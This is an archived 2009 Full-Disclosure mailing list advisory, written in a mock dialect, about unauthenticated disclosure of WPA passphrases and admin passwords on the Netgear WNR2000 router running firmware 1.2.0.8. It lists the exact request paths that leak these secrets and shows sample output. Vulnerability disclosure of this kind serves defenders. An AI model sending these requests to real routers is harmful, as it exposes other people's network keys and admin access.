| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <bf89947d0908181227w438628b5s7bd22a75fa375975@mail.gmail.com> Date: Tue, 18 Aug 2009 13:27:41 -0600 From: Jean Trolleur <sigtstp@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Information disclosure on Netgear WNR2000 Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless routa' runnin' firmware 1.2.0.8. 1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply request widout audenticashun: http://netgear/router-info.htm http://netgear/cgi-bin/router-info.htm De routa' gots'ta respond wid: DeviceID:WNR2000; HardwareVersion:; FirmwareVersion:V1.2.0.8NA; WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf 2. Unaudenticated disclosho' man uh administrato' passwo'd Simply request widout audenticashun: http://netgear/cgi-bin/NETGEAR_WNR2000.cfg Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme be left as an 'esercise t'de eyeballer. Ah be baaad... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists